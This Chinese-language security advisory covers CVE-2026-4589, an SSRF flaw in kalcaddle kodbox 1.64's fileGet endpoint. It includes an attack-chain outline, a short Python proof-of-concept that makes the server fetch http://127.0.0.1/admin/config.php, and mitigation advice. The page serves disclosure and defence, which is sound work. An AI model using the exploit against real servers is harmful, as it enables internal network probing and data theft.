CVE-2026-4589 CVSS 6.3 中危

CVE-2026-4589: kalcaddle kodbox SSRF漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4589

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle kodbox

漏洞概述

kalcaddle kodbox 1.64版本存在一个服务器端请求伪造（SSRF）漏洞。该漏洞源于`fileGet`端点组件中的`PathDriverUrl`函数未能严格验证传入的`path`参数。攻击者可利用此缺陷构造恶意请求，诱导服务器向内部网络或任意外部资源发起请求。该漏洞允许远程攻击，无需用户交互，且利用代码已公开，可能导致敏感数据泄露。

技术细节

该漏洞发生在kalcaddle kodbox的文件处理逻辑中。具体受影响的文件为`/app/controller/explorer/editor.class.php`，涉及`fileGet`接口调用的`PathDriverUrl`函数。在处理文件路径时，程序直接使用了用户通过`path`参数提交的数据，而未对其进行有效的网络位置校验或格式过滤。攻击者可以通过发送特制的HTTP请求，将`path`参数设置为内网地址（如http://127.0.0.1/）、云元数据地址或其他受限资源。服务器在接收到请求后，会由`PathDriverUrl`函数解析并代为请求该地址，从而将响应返回给攻击者。由于CVSS向量显示攻击复杂度为低且需要低权限，这意味着已注册的低权限用户即可触发此漏洞。结合远程攻击特性，该漏洞可被用于扫描内网端口、读取本地敏感文件或利用SSRF进行进一步的攻击。

攻击链分析

STEP 1

获取访问权限

攻击者注册或获取目标kalcaddle kodbox系统的低权限用户账户（PR:L）。

STEP 2

构造恶意Payload

攻击者利用`fileGet`接口，将`path`参数修改为内网敏感地址（如127.0.0.1）或外部恶意URL。

STEP 3

发送请求触发漏洞

向服务器发送包含恶意`path`参数的HTTP请求，服务器端`PathDriverUrl`函数未做过滤直接解析。

STEP 4

执行SSRF攻击

服务器代为请求内网资源，将响应数据返回给攻击者，导致信息泄露或内网探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://target-kodbox-server.com"

# Attacker requires a low-privilege session (PR:L)
# Replace with valid session cookie
session_cookie = "valid_php_session_id_here"

headers = {
    "Cookie": f"PHPSESSID={session_cookie}",
    "User-Agent": "SSRF-Test-Case"
}

# The vulnerability is in the 'fileGet' endpoint via the 'path' parameter
# We attempt to access an internal resource (e.g., localhost admin)
ssrf_payload = {
    "path": "http://127.0.0.1/admin/config.php"
}

url = f"{target_host}/index.php?explorer/editor/fileGet"

try:
    response = requests.post(url, data=ssrf_payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[!] Potential SSRF triggered!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[ Error occurred: {e}")

影响范围

kalcaddle kodbox 1.64

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面限制Web服务器的出站连接，仅允许访问必要的白名单IP或域名。同时，部署Web应用防火墙（WAF）规则，检测并阻断针对`explorer/editor/fileGet`接口的异常参数传递，特别是检查`path`参数中是否包含URL协议头（如http://, https://, file://）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4589
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4589
3 Details https://www.cvedetails.com/cve/CVE-2026-4589/
4 VulDB https://vuldb.com/cve/CVE-2026-4589
5 Link https://vuldb.com/submit/775467
6 Link https://vuldb.com/vuln/352425
7 Link https://vuldb.com/vuln/352425/cti
8 Link https://vulnplus-note.wetolink.com/share/UTZQq38f9VyI

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表